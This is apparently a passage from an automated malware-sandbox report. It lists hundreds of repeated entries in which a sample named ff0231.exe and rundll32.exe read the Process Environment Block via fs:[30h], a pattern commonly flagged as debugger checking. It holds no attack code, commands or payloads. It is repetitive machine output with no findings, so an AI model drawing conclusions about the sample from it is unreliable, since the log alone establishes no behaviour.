Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CAAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EFAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B52A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E2ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E2AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D3A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B5210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C8A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F4A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A6B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A6B260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A88A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B9240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7EA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A44257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E2397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A85BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EB390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C1B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A6D380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E4BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A353CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A353CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DDBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7131B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BF358 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BDB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E3B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A88B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BDB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A714FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A88CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A8740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A8740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A8740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EBC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A805AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A805AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B2D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7FDE2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A68DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A36DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CD5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A3A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A88D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7E539 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E4D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C3D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BAD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D7D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F3D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A33540 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A63D40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DC577 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A346A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A80EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A80EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A80EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A6FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A88ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C76E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A6FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BC600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A71608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BE620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C7E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A7AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DAE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009C8794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A37794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A37794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A37794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DF716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A8070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A8070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B4F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A88F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CEF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CFF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05009100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05009100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05009100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05024120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05024120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05024120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05024120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05024120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05013D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050CE539 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05034D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05034D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05034D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_050D8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0508A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0502B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0502B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05043D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05083540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05027D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0500B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0502C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0502C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0502C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05032581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05032581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05032581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05032581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_0503A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05002D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_05002D8A mov eax, dword ptr fs:[00000030h]
